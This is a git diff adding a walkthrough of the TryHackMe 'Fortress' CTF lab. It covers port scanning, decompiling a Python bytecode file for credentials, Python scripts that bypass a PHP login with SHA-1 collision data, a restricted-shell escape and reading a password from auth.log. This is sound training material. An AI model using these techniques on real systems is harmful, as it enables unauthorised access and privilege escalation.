diff --git a/TryHackMe/Fortress.md b/TryHackMe/Fortress.md new file mode 100644 index 0000000..a0467a3 --- /dev/null +++ b/TryHackMe/Fortress.md @@ -0,0 +1,330 @@ +# TryHackMe-Fortress + +## NMAP + +```bash +PORT STATE SERVICE REASON VERSION +22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 9f:d0:bb:c7:e2:ee:7f:91:fe:c2:6a:a6:bb:b2:e1:91 (RSA) +| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCXx2nOQ7SVuA1liJqX+ZR2KK9Oipy+1cd4ZZ3iD+/xuAkvon338WPfjcGmNaBd0McHqunhvl1xJZZMsOsjVuMUSD0GUX3YF6BQ/RdVxQ00/g +RvVW70nUk+kf+Umz/5HbI9IfBLoIcRGWxf3naUdl8Vfs7Fj38fnZB0A+8av3/VAthEhiOq58o9ssQJ7DD6ZJydt4R1G9WYa2C+8O76/rJ9EadLCaNAeKKUYmuGEdJit+vGsd4ggzYc0qJQ2QmRUr +VK+FeIFZDIo4InaPIiI1VF0X+ooax1siytlF85f5956EfDsGgzNBZb/9I5tGz4QFnM/FH65fXEnvUrDoXO2+dj +| 256 06:4b:fe:c0:6e:e4:f4:7e:e1:db:1c:e7:79:9d:2b:1d (ECDSA) +| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPBJBTN55zS77xduARAxZeA+xhJt04e3yVZpkmTObu2JMOjxTzFoK4mftWUdLsx1bs1mDIWWXL +OKjXcnq3PcO84= +| 256 0d:0e:ce:57:00:1a:e2:8d:d2:1b:2e:6d:92:3e:65:c4 (ED25519) +|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJezjvXtsHInz+XQ4hYfNBX5kjinTpiKRYaK5rF1og71 +5581/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3 +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_-rw-r--r-- 1 ftp ftp 305 Jul 25 20:06 marked.txt +| ftp-syst: +| STAT: +| FTP server status: +| Connected to ::ffff:10.8.94.60 +| Logged in as ftp +| TYPE: ASCII +| No session bandwidth limit +| Session timeout in seconds is 300 +| Control connection is plain text +| Data connections will be plain text +| At session startup, client count was 2 +| vsFTPd 3.0.3 - secure, fast, stable +|_End of status +5752/tcp open unknown syn-ack ttl 63 +5752/tcp open unknown syn-ack ttl 63 +| fingerprint-strings: +| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, LANDesk-RC, LPDString, RTSPRequest, S +IPOptions, X11Probe: +| Chapter 1: A Call for help +| Username: Password: +| Kerberos, LDAPBindReq, LDAPSearchReq, NCP, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie: +| Chapter 1: A Call for help +|_ Username: +7331/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) +| http-methods: +|_ Supported Methods: OPTIONS GET HEAD POST +|_http-server-header: Apache/2.4.18 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +``` + +We can see port 5581 which is ftp and `anonymous` login is enabled so we can login as anonymous user , on port 7331 , apache server is running and on 5752 seems like some response so we'll get too it also we are told to add these two domain names `fortress`, `temple.fortress` from the room description , we can add those to `/etc/hosts` file + + + + + +## PORT 5581 (FTP) + + + +If we do `ls -la` we'll see a hidden file called `.file` + + + +So we can download these files using `get` + + + +We don't find much information from `marked.txt` other than telling us the username `veekay` + + + +And the other file is python 2.7 compiled byte-file + + + + +We decompile this file to human readable file using `uncompyle2` , we can git clone it's repoistory and install the binary using `python setup.py install` + + + + + + + +Here we see username and password which are hard coded converted from string to `byte_to_long` format , so let's try to convert a random string to see a long byte format also we can convert it back to a byte string using `long_to_bytes` + +```python3 + +from Crypto.Util.number import bytes_to_long,long_to_bytes + +test = bytes("abcbbc","utf-8") # can be written as b"abcbbc" as well +long_test = bytes_to_long(test) +print (long_test) +print (long_to_bytes(long_test)) +``` + + + +But we don't get `L` at the end of long byte string , let's try removing it from username and password variables and try to convert it back to byte string format + + + +These are aleady in long byte format so we just need to use `long_to_bytes` + + + +So we got the username and password in a string format but the question is where do we send these credentials ? I tried making a http request on port 5752 but connection timed out so it must be running on some other protocol + +## PORT 5752 (Telnet) + +Eventually I figuired out it was telnet by trying connecting to it + + + +We get this text `t3mple_0f_y0ur_51n5` which is from that `secrets.txt` because it was calling the function which would return the contents of that file on providing correct credentials + +## PORT 7331 (HTTP) + + + +On the apache web server we only get the default web page , I tried running `gobuster` with `big.txt` , `common.txt` but came up with nothing , so then tried look for the page we got from secrets.txt but it didn't loaded until I added a php extension to it + + + +Again we don't see much on this page but after viewing the source code through ctrl+u + + + +The reason why we are seeing html code is becuase browser executes php code but renders html code that's why we can html tags here , also going to css file we can get a "hint" + + + +This looks like base64 encoded text which on decoding we get this + + + +It's talking about "colliding" something maybe a secret or a hash ? Judging from that html commented code we saw , let's try changing the extension to `.html` + + + +And we got a different page with input fields also viewing the html source code + + + +We can see some php code here + + + +What it's doing is that , taking two GET parameters `user` and `pass` doing a type check also checking it's SHA-1 hash if they are similar which is what we call hash collision and back in 2017 someone discovered a collision in SHA-1 by calculating the hash of two pdf files + + + +So what if we make a python script that will fetch those files content in variables and then we will make a GET request to `t3mple_0f_y0ur_51n5.php` with those parameters + +```python +import requests + +# Fetching 2 pdf's file which cause SHA-1 collision + +pdf1 = requests.get("https://shattered.it/static/shattered-1.pdf") +pdf2 = requests.get("https://shattered.it/static/shattered-2.pdf") + +# Assinging pdf's content into the GET parameters + +params = {'user': pdf1.content, 'pass': pdf2.content} + +r = requests.get("http://temple.fortress:7331/t3mple_0f_y0ur_51n5.php/",params=params) +print (r.text) +``` + +But this didn't worked as pdf file's "length exceeds the capacity" + + + + +Maximum capacity of url request is 8 KB while we exceed this limit as combined size of those files is 825 KB + + + + + +I found the way around through a writeup from a 2017 CTF challenge which was based on the same concept of SHA-1 hash collision + + + + + +We have a total of 1.6 KB and if we check SHA1 hash of both these files + + + +They are similar , so here I am just going to host them on my own machine and fetch it + +```python +import requests + +# Fetching 2 pdf's file which cause SHA-1 collision + +pdf1 = requests.get("http://localhost/1-pdf.192") +pdf2 = requests.get("http://localhost/2-pdf.192") + +# Assinging pdf's content into the GET parameters + +params = {'user': pdf1.content, 'pass': pdf2.content} + +r = requests.get("http://temple.fortress:7331/t3mple_0f_y0ur_51n5.php/",params=params) +print (r.text) + +``` + +Although we have succeded in making the request smaller but the contents are identical so we according the writeup we need to put first 320 bytes of the pdf file + + + + + +This makes a total of 640 bytes , also checking the SHA1 hashes + + + +These two files look different but fingers crossed + + + +```python3 +import requests + +# Fetching 2 pdf's file which cause SHA-1 collision + +pdf1 = requests.get("http://localhost/shattered-1.dat") +pdf2 = requests.get("http://localhost/shattered-2.dat") + +# Assinging pdf's content into the GET parameters + +params = {'user': pdf1.content, 'pass': pdf2.content} + +r = requests.get("http://temple.fortress:7331/t3mple_0f_y0ur_51n5.php/",params=params) +print (r.text) + +``` + +But this didn't work + + + + + +This is the reason why it didn't worked as both values are having a length of 320 and there's a condition that `user` must have a length greater than 600 and `pass` must have a lenght greater than 500 + +I found two other files whose SHA1 hashes collide + + + + + +Here we can see both are of 640 bytes which passes the condition and total size is 1.2KB so this request can be allowed + + + +We get a hidden file `m0td_f0r_j4x0n.txt` , so this must be a username `j4x0n`, on visting that file we'll get the private key + + + +But the message here was kinda vauge as it stated that "I am leaving a private key for you j4x0n" which was written by `h4rdy` + + + +So this key was for h4rdy, if we try to do `sudo -l` it won't work it seems that we are in restricted bash + + + +If we try to change PATH variable it won't allow as it's set to read only + + + +I tried doing autocomplete to see if I can see any files or directories + + + +But if we try to login using `-t` which enables "pseudo-tty allocation" + + + +We can run `cd` and `export` commands so let's set the `SHELL` variable to `/bin/bash` and also change the `PATH` variable + + + +## Privilege Escalation (ja4xon) + +We can now run commands, so now doing `sudo -l` we can see that this user is allowed to run `cat` as `j4x0n` user + + + +We can read these two files + + + + + +Let's just copy the id_rsa key (private key) and login as `j4x0n` + + + +But still we can't use `sudo -l` as we don't know the password + + + +So we need to maybe find this user's password as he is in sudoers group + + + +In `/opt` directoy we see a SUID binary named `bt` on running tells that it's spawning a root shell but instead keeps printing buch of gibberish on the terminal and force us to exit out of ssh connection , I didn't find anything , manully tried looking into directories , checking local ports and cron jobs but we were in `adm` group which can read log files so I though of visiting `/var/logs/auth.log` + + + +Let's give this password a try + + + +With this we rooted this room. + + +## References + +- https://reverseengineering.stackexchange.com/questions/1701/decompiling-pyc-files +- https://github.com/Mysterie/uncompyle2 +- https://stackoverflow.com/questions/3475648/sha1-collision-demo-example +- https://github.com/fabacab/CTF/tree/master/2017/BKP/cloud/Prudentialv2 +- https://sha-mbles.github.io/ \ No newline at end of file